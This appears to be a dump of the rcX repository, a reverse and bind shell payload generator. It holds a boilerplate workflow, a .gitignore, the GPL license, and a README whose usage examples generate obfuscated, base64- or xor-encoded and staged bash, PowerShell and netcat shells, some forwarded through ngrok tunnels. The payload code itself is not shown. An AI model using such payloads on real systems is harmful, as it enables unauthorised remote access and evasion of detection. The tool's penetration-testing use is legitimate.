├── .github
    └── workflows
    │   └── build.yml
├── .gitignore
├── LICENSE
├── README.md
├── index_template.html
├── payloads_template.json
├── payloads_template.yml
├── rcX-png
    ├── favicon.ico
    ├── logo.png
    ├── rcx-main.png
    ├── rcx-obf.png
    ├── rcx-online-curl.gif
    ├── rcx-staged.png
    ├── rcx-table.png
    ├── rcx-web-cli.png
    └── rcxonline.gif
├── rcX.py
└── requirements.txt


/.github/workflows/build.yml:
--------------------------------------------------------------------------------
 1 | # This is a basic workflow to help you get started with Actions
 2 | 
 3 | name: Build
 4 | 
 5 | # Controls when the workflow will run
 6 | on:
 7 |   # Triggers the workflow on push or pull request events but only for the main branch
 8 |   push:
 9 |     branches: [ main ]
10 |   pull_request:
11 |     branches: [ main ]
12 | 
13 |   # Allows you to run this workflow manually from the Actions tab
14 |   workflow_dispatch:
15 | 
16 | # A workflow run is made up of one or more jobs that can run sequentially or in parallel
17 | jobs:
18 |   # This workflow contains a single job called "build"
19 |   build:
20 |     # The type of runner that the job will run on
21 |     runs-on: ubuntu-latest
22 | 
23 |     # Steps represent a sequence of tasks that will be executed as part of the job
24 |     steps:
25 |       # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
26 |       - uses: actions/checkout@v2
27 | 
28 |       # Runs a single command using the runners shell
29 |       - name: Run a one-line script
30 |         run: echo Hello, world!
31 | 
32 |       # Runs a set of commands using the runners shell
33 |       - name: Run a multi-line script
34 |         run: |
35 |           echo Add other actions to build,
36 |           echo test, and deploy your project.
37 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | pip-wheel-metadata/
 24 | share/python-wheels/
 25 | *.egg-info/
 26 | .installed.cfg
 27 | *.egg
 28 | MANIFEST
 29 | 
 30 | # PyInstaller
 31 | #  Usually these files are written by a python script from a template
 32 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 33 | *.manifest
 34 | *.spec
 35 | 
 36 | # Installer logs
 37 | pip-log.txt
 38 | pip-delete-this-directory.txt
 39 | 
 40 | # Unit test / coverage reports
 41 | htmlcov/
 42 | .tox/
 43 | .nox/
 44 | .coverage
 45 | .coverage.*
 46 | .cache
 47 | nosetests.xml
 48 | coverage.xml
 49 | *.cover
 50 | *.py,cover
 51 | .hypothesis/
 52 | .pytest_cache/
 53 | 
 54 | # Translations
 55 | *.mo
 56 | *.pot
 57 | 
 58 | # Django stuff:
 59 | *.log
 60 | local_settings.py
 61 | db.sqlite3
 62 | db.sqlite3-journal
 63 | 
 64 | # Flask stuff:
 65 | instance/
 66 | .webassets-cache
 67 | 
 68 | # Scrapy stuff:
 69 | .scrapy
 70 | 
 71 | # Sphinx documentation
 72 | docs/_build/
 73 | 
 74 | # PyBuilder
 75 | target/
 76 | 
 77 | # Jupyter Notebook
 78 | .ipynb_checkpoints
 79 | 
 80 | # IPython
 81 | profile_default/
 82 | ipython_config.py
 83 | 
 84 | # pyenv
 85 | .python-version
 86 | 
 87 | # pipenv
 88 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 89 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 90 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 91 | #   install all needed dependencies.
 92 | #Pipfile.lock
 93 | 
 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
 95 | __pypackages__/
 96 | 
 97 | # Celery stuff
 98 | celerybeat-schedule
 99 | celerybeat.pid
100 | 
101 | # SageMath parsed files
102 | *.sage.py
103 | 
104 | # Environments
105 | .env
106 | .venv
107 | env/
108 | venv/
109 | ENV/
110 | env.bak/
111 | venv.bak/
112 | 
113 | # Spyder project settings
114 | .spyderproject
115 | .spyproject
116 | 
117 | # Rope project settings
118 | .ropeproject
119 | 
120 | # mkdocs documentation
121 | /site
122 | 
123 | # mypy
124 | .mypy_cache/
125 | .dmypy.json
126 | dmypy.json
127 | 
128 | # Pyre type checker
129 | .pyre/
130 | 
131 | *.png binary


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 2, June 1991
  3 | 
  4 |  Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
  5 |  51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
  6 |  Everyone is permitted to copy and distribute verbatim copies
  7 |  of this license document, but changing it is not allowed.
  8 | 
  9 |                             Preamble
 10 | 
 11 |   The licenses for most software are designed to take away your
 12 | freedom to share and change it.  By contrast, the GNU General Public
 13 | License is intended to guarantee your freedom to share and change free
 14 | software--to make sure the software is free for all its users.  This
 15 | General Public License applies to most of the Free Software
 16 | Foundation's software and to any other program whose authors commit to
 17 | using it.  (Some other Free Software Foundation software is covered by
 18 | the GNU Lesser General Public License instead.)  You can apply it to
 19 | your programs, too.
 20 | 
 21 |   When we speak of free software, we are referring to freedom, not
 22 | price.  Our General Public Licenses are designed to make sure that you
 23 | have the freedom to distribute copies of free software (and charge for
 24 | this service if you wish), that you receive source code or can get it
 25 | if you want it, that you can change the software or use pieces of it
 26 | in new free programs; and that you know you can do these things.
 27 | 
 28 |   To protect your rights, we need to make restrictions that forbid
 29 | anyone to deny you these rights or to ask you to surrender the rights.
 30 | These restrictions translate to certain responsibilities for you if you
 31 | distribute copies of the software, or if you modify it.
 32 | 
 33 |   For example, if you distribute copies of such a program, whether
 34 | gratis or for a fee, you must give the recipients all the rights that
 35 | you have.  You must make sure that they, too, receive or can get the
 36 | source code.  And you must show them these terms so they know their
 37 | rights.
 38 | 
 39 |   We protect your rights with two steps: (1) copyright the software, and
 40 | (2) offer you this license which gives you legal permission to copy,
 41 | distribute and/or modify the software.
 42 | 
 43 |   Also, for each author's protection and ours, we want to make certain
 44 | that everyone understands that there is no warranty for this free
 45 | software.  If the software is modified by someone else and passed on, we
 46 | want its recipients to know that what they have is not the original, so
 47 | that any problems introduced by others will not reflect on the original
 48 | authors' reputations.
 49 | 
 50 |   Finally, any free program is threatened constantly by software
 51 | patents.  We wish to avoid the danger that redistributors of a free
 52 | program will individually obtain patent licenses, in effect making the
 53 | program proprietary.  To prevent this, we have made it clear that any
 54 | patent must be licensed for everyone's free use or not licensed at all.
 55 | 
 56 |   The precise terms and conditions for copying, distribution and
 57 | modification follow.
 58 | 
 59 |                     GNU GENERAL PUBLIC LICENSE
 60 |    TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
 61 | 
 62 |   0. This License applies to any program or other work which contains
 63 | a notice placed by the copyright holder saying it may be distributed
 64 | under the terms of this General Public License.  The "Program", below,
 65 | refers to any such program or work, and a "work based on the Program"
 66 | means either the Program or any derivative work under copyright law:
 67 | that is to say, a work containing the Program or a portion of it,
 68 | either verbatim or with modifications and/or translated into another
 69 | language.  (Hereinafter, translation is included without limitation in
 70 | the term "modification".)  Each licensee is addressed as "you".
 71 | 
 72 | Activities other than copying, distribution and modification are not
 73 | covered by this License; they are outside its scope.  The act of
 74 | running the Program is not restricted, and the output from the Program
 75 | is covered only if its contents constitute a work based on the
 76 | Program (independent of having been made by running the Program).
 77 | Whether that is true depends on what the Program does.
 78 | 
 79 |   1. You may copy and distribute verbatim copies of the Program's
 80 | source code as you receive it, in any medium, provided that you
 81 | conspicuously and appropriately publish on each copy an appropriate
 82 | copyright notice and disclaimer of warranty; keep intact all the
 83 | notices that refer to this License and to the absence of any warranty;
 84 | and give any other recipients of the Program a copy of this License
 85 | along with the Program.
 86 | 
 87 | You may charge a fee for the physical act of transferring a copy, and
 88 | you may at your option offer warranty protection in exchange for a fee.
 89 | 
 90 |   2. You may modify your copy or copies of the Program or any portion
 91 | of it, thus forming a work based on the Program, and copy and
 92 | distribute such modifications or work under the terms of Section 1
 93 | above, provided that you also meet all of these conditions:
 94 | 
 95 |     a) You must cause the modified files to carry prominent notices
 96 |     stating that you changed the files and the date of any change.
 97 | 
 98 |     b) You must cause any work that you distribute or publish, that in
 99 |     whole or in part contains or is derived from the Program or any
100 |     part thereof, to be licensed as a whole at no charge to all third
101 |     parties under the terms of this License.
102 | 
103 |     c) If the modified program normally reads commands interactively
104 |     when run, you must cause it, when started running for such
105 |     interactive use in the most ordinary way, to print or display an
106 |     announcement including an appropriate copyright notice and a
107 |     notice that there is no warranty (or else, saying that you provide
108 |     a warranty) and that users may redistribute the program under
109 |     these conditions, and telling the user how to view a copy of this
110 |     License.  (Exception: if the Program itself is interactive but
111 |     does not normally print such an announcement, your work based on
112 |     the Program is not required to print an announcement.)
113 | 
114 | These requirements apply to the modified work as a whole.  If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works.  But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 | 
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 | 
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 | 
134 |   3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 | 
138 |     a) Accompany it with the complete corresponding machine-readable
139 |     source code, which must be distributed under the terms of Sections
140 |     1 and 2 above on a medium customarily used for software interchange; or,
141 | 
142 |     b) Accompany it with a written offer, valid for at least three
143 |     years, to give any third party, for a charge no more than your
144 |     cost of physically performing source distribution, a complete
145 |     machine-readable copy of the corresponding source code, to be
146 |     distributed under the terms of Sections 1 and 2 above on a medium
147 |     customarily used for software interchange; or,
148 | 
149 |     c) Accompany it with the information you received as to the offer
150 |     to distribute corresponding source code.  (This alternative is
151 |     allowed only for noncommercial distribution and only if you
152 |     received the program in object code or executable form with such
153 |     an offer, in accord with Subsection b above.)
154 | 
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it.  For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable.  However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 | 
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 | 
172 |   4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License.  Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 | 
180 |   5. You are not required to accept this License, since you have not
181 | signed it.  However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works.  These actions are
183 | prohibited by law if you do not accept this License.  Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 | 
189 |   6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions.  You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 | 
197 |   7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License.  If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all.  For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 | 
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 | 
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices.  Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 | 
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 | 
229 |   8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded.  In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 | 
237 |   9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time.  Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 | 
242 | Each version is given a distinguishing version number.  If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation.  If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 | 
250 |   10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission.  For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this.  Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 | 
258 |                             NO WARRANTY
259 | 
260 |   11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 | 
270 |   12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 | 
280 |                      END OF TERMS AND CONDITIONS
281 | 
282 |             How to Apply These Terms to Your New Programs
283 | 
284 |   If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 | 
288 |   To do so, attach the following notices to the program.  It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 | 
293 |     <one line to give the program's name and a brief idea of what it does.>
294 |     Copyright (C) <year>  <name of author>
295 | 
296 |     This program is free software; you can redistribute it and/or modify
297 |     it under the terms of the GNU General Public License as published by
298 |     the Free Software Foundation; either version 2 of the License, or
299 |     (at your option) any later version.
300 | 
301 |     This program is distributed in the hope that it will be useful,
302 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
303 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
304 |     GNU General Public License for more details.
305 | 
306 |     You should have received a copy of the GNU General Public License along
307 |     with this program; if not, write to the Free Software Foundation, Inc.,
308 |     51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 | 
310 | Also add information on how to contact you by electronic and paper mail.
311 | 
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 | 
315 |     Gnomovision version 69, Copyright (C) year name of author
316 |     Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 |     This is free software, and you are welcome to redistribute it
318 |     under certain conditions; type `show c' for details.
319 | 
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License.  Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 | 
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary.  Here is a sample; alter the names:
328 | 
329 |   Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 |   `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 | 
332 |   <signature of Ty Coon>, 1 April 1989
333 |   Ty Coon, President of Vice
334 | 
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs.  If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library.  If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | 
  2 | [![Build](https://github.com/FlyfishSec/rcX/actions/workflows/build.yml/badge.svg)](https://github.com/FlyfishSec/rcX/actions/workflows/build.yml)
  3 | [![Python 2.7|3.x](https://img.shields.io/badge/python-2.7|3.6|3.7|3.8|3.9|3.10-green.svg?logo=python&logoColor=yellow)](https://www.python.org/)
  4 | [![GitHub release](https://img.shields.io/github/v/tag/FlyfishSec/rcX.svg?label=release&color=green)](https://github.com/FlyfishSec/rcX/releases)
  5 | [![GitHub downloads](https://img.shields.io/github/downloads/flyfishSec/rcX/total?color=cyan)](https://github.com/FlyfishSec/rcX/releases)
  6 | [![License](https://img.shields.io/badge/license-GPLv2-red.svg?color=green)](https://cdn.rawgit.com/FlyfishSec/rcX/main/LICENSE)
  7 | # [<img width="80" src="https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/logo.png"/>](https://github.com/FlyfishSec/rcX/releases)
  8 | ## [rcxonline.cf](https://rcxonline.cf)/[rcxonline.ml](https://rcxonline.ml)
  9 | 
 10 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcxonline.gif "rcX")
 11 | 
 12 | ## curl
 13 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-online-curl.gif)
 14 | 
 15 | ## What is rcX?
 16 | ### "rc" - stands for remote command or remote code.
 17 | ### "X" - you can understand as assistant or tool.
 18 | 
 19 |   The predecessor of rcX is rsGen(A Reverse Shell Payload Generator). Currently, it is a powerful Reverse/Bind shell Generator.
 20 |   More features will be added in the future.
 21 |   
 22 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-main.png "rcX")
 23 | 
 24 | ## Local use
 25 | `pip install -r requirements.txt`
 26 | or Download the packaged <a href="https://github.com/FlyfishSec/rcX/releases" target="_blank">binaries</a>
 27 | ### CLI Usage
 28 | #### Example:
 29 | ##### 1.Get a bash reverse shell and output in tabular format.
 30 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --table`
 31 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-table.png "rcX")
 32 | ##### 2.Custom shell path.
 33 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -s "/bin/sh"`
 34 | ##### 3.Copy the specified id payload to the clipboard.
 35 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --table -c 5`
 36 | ##### 4.Get a base64 encoded bash reverse shell.
 37 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -e base64`
 38 | ##### 5.Get a xor encoded and obfuscated bash reverse shell.
 39 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash -e xor --obf reverse --table --clip 7`
 40 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-obf.png "rcX")
 41 | ##### 6.Get a staging bash reverse shell.
 42 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --staging-url 0 --staging-cmd 0`
 43 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-staged.png "rcX")
 44 | ##### 7.Get a staging bash reverse shell and forward local port using ngrok tunnel.
 45 | `python rcX.py -l 127.0.0.1 -p 8888 -t bash --tunnel ngrok_jp`
 46 | ##### 8.Get a Windows Powershell reverse shell.
 47 | `python rcX.py -l 127.0.0.1 -p 8888 -t powershell -P windows`
 48 | #### ...
 49 | 
 50 | ### Web UI
 51 | > At the same time, rcX also provides a web interface. 
 52 | Use rcX as a server then you can use it with your team or friends.
 53 | 
 54 | > <del> Tip: When rcX is running as a server, if the request origin is not 127.0.0.1 or localhost, the ngrok tunnel feature will be disabled and the related options will be hidden on the Front-end</del>
 55 | 
 56 | #### Example:
 57 | `python rcX.py -w`
 58 | 
 59 | ### Web CLI
 60 | > When rcX is running as a server, you can use curl in terminal to get the payload.
 61 | #### Example:
 62 | ##### 1.Get a bash reverse shell payload
 63 |   `curl http://127.0.0.1/linux/bash/127.0.0.4/8888`
 64 | ![rcX](https://cdn.rawgit.com/FlyfishSec/rcX/main/rcX-png/rcx-web-cli.png "rcX")
 65 | ##### 2.Base64 encoded
 66 |   `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64`
 67 | 
 68 | ##### 3.Base64 and hex encoded
 69 |   `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/base64,hex`
 70 | 
 71 | ##### 4.Gzip compress and replace_char(obfuscation method)
 72 |   `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/gzip/replace_char`
 73 | 
 74 | ##### 5.xor encoded and reverse(obfuscation method)
 75 |   `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/xor/reverse`
 76 | 
 77 | ##### 6.Get a Windows powershell reverse shell payload
 78 |   `curl http://127.0.0.1/windows/powershell/127.0.0.4/44444`
 79 | 
 80 | ##### 7.replace_char(obfuscation method) only without using encoder
 81 |   `curl http://127.0.0.1/windows/powershell/127.0.0.4/44444/,/replace_char`
 82 | 
 83 | ##### 8.Only use staging, without any encoder and obfuscator
 84 |   `curl http://127.0.0.1/linux/bash/127.0.0.4/8888/,/,/1/1`
 85 | 
 86 | ##### 9.Get a bind linux netcat shell payload
 87 |   `curl http://127.0.0.1/bind/linux/netcat/127.0.0.4/8888`
 88 | 
 89 | 
 90 | ## Support rcX
 91 | 
 92 | |Bitcoin Address QR Code|Ethereum Address QR Code|Monero Address QR Code|DOGECOIN Address QR Code|
 93 | |:--------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------:|
 94 | | <img width="175" height="175" src="https://cdn.rawgit.com/FlyfishSec/rsGen/master/Screenshot/donate-btc.png"/> | <img width="175" height="175" src="https://cdn.rawgit.com/FlyfishSec/rsGen/master/Screenshot/donate-eth.png"/> | <img width="175" height="175" src="https://cdn.rawgit.com/FlyfishSec/rsGen/master/Screenshot/donate-xmr.png"/> | <img width="175" height="175" src="https://cdn.rawgit.com/FlyfishSec/rsGen/master/Screenshot/donate-doge.png"/> |
 95 | 
 96 | *BTC*: 3F2R6KMXbJ576yJNJpjrBnhVG64Ltg1WoF
 97 | 
 98 | *ETH*: 0xab15323b0c7721B6B9fDf5A8089a6Ec697C9feED
 99 | 
100 | *XMR*: 48rBRHh2iV27oHzXMGnjbwCLLyinpqFry6gLTAaQiFVtMRw4kqabeoFiBYqNAPCBHbKjgQezPNLwDihMSNbEPCuYP1xzCWi
101 | 
102 | *Dogecoin*: DBQATuB7t4wk56dwFqcGdqQtY8BSjL77if
103 | 
104 | 
105 | 


--------------------------------------------------------------------------------
/index_template.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | 
  4 | <head>
  5 |     <link rel="icon" type="image/x-icon" href="https://cdn.jsdelivr.net/gh/FlyfishSec/rcX@main/rcX-png/favicon.ico">
  6 |     <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700,800" rel="stylesheet" type="text/css">
  7 |     <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
  8 |     <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.10.2/dist/umd/popper.min.js" integrity="sha384-7+zCNj/IqJ95wo16oMtfsKbZ9ccEh31eOz1HGyDuCQ6wgnyJNSYdrPa03rtR1zdB" crossorigin="anonymous"></script>
  9 |     <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js" integrity="sha384-QJHtvGhmr9XOIpI6YVutG+2QOK9T+ZnN4kzFN1RtK3zEFEIsxhlmWl5/YESvpZ13" crossorigin="anonymous"></script>
 10 |     <script src="https://cdn.jsdelivr.net/npm/jquery@2.1.3/dist/jquery.min.js"></script>
 11 |     <script src="https://cdn.jsdelivr.net/npm/chosen-js@1.8.7/chosen.jquery.min.js" integrity="sha512-rMGGF4wg1R73ehtnxXBt5mbUfN9JUJwbk21KMlnLZDJh7BkPmeovBuddZCENJddHYYMkCh9hPFnPmS9sspki8g==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
 12 |     <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/chosen-js@1.8.7/chosen.min.css" integrity="sha512-yVvxUQV0QESBt1SyZbNJMAwyKvFTLMyXSyBHDO4BG5t7k/Lw34tyqlSDlKIrIENIzCl+RVUNjmCPG+V/GMesRw==" crossorigin="anonymous" referrerpolicy="no-referrer">
 13 |     <meta charset="UTF-8">
 14 |     <style>
 15 |         .chosen-container-multi .chosen-choices li.search-field input[type=text] {
 16 |             height: 34px
 17 |         }
 18 |         .chosen-container-multi .chosen-choices li.search-choice {
 19 |             border: 1px solid #ced4da;
 20 |             line-height: 20px
 21 |         }
 22 |         
 23 |         .input-group>:not(:first-child):not(.dropdown-menu):not(.valid-tooltip):not(.valid-feedback):not(.invalid-tooltip):not(.invalid-feedback) {
 24 |             min-width: 100px
 25 |         }
 26 |         
 27 |         .nav-tabs>li>.nav-link {
 28 |             color: gray;
 29 |             padding: 5px;
 30 |             border-radius: 3px
 31 |         }
 32 |         
 33 |         button.close {
 34 |             padding: 0;
 35 |             cursor: pointer;
 36 |             background: 0 0;
 37 |             border: 0;
 38 |             -webkit-appearance: none;
 39 |             -moz-appearance: none;
 40 |             appearance: none
 41 |         }
 42 |         
 43 |         .close {
 44 |             float: right;
 45 |             font-size: 21px;
 46 |             font-weight: 700;
 47 |             line-height: 1;
 48 |             color: #000;
 49 |             text-shadow: 0 1px 0 #fff;
 50 |             filter: alpha(opacity=20);
 51 |             opacity: .2
 52 |         }
 53 |         
 54 |         .accordion-button::after {
 55 |             background-image: url("data:image/svg+xml,%3csvg viewBox='0 0 16 16' fill='%23333' xmlns='http://www.w3.org/2000/svg'%3e%3cpath fill-rule='evenodd' d='M8 0a1 1 0 0 1 1 1v6h6a1 1 0 1 1 0 2H9v6a1 1 0 1 1-2 0V9H1a1 1 0 0 1 0-2h6V1a1 1 0 0 1 1-1z' clip-rule='evenodd'/%3e%3c/svg%3e");
 56 |             transform: scale(.7)!important
 57 |         }
 58 |         
 59 |         .accordion-button:not(.collapsed)::after {
 60 |             background-image: url("data:image/svg+xml,%3csvg viewBox='0 0 16 16' fill='%23333' xmlns='http://www.w3.org/2000/svg'%3e%3cpath fill-rule='evenodd' d='M0 8a1 1 0 0 1 1-1h14a1 1 0 1 1 0 2H1a1 1 0 0 1-1-1z' clip-rule='evenodd'/%3e%3c/svg%3e")
 61 |         }
 62 |     </style>
 63 | </head>
 64 | 
 65 | <body>
 66 |     <h1 class="text-center text-muted">rcX - Shell Generator</h1>
 67 |     <div class="container">
 68 |         <form id="form" class="form">
 69 |             <div class="input-group mb-3">
 70 |                 <div class="input-group-prepend"><span class="input-group-text" id="inputGroup-sizing-default">Host</span></div>
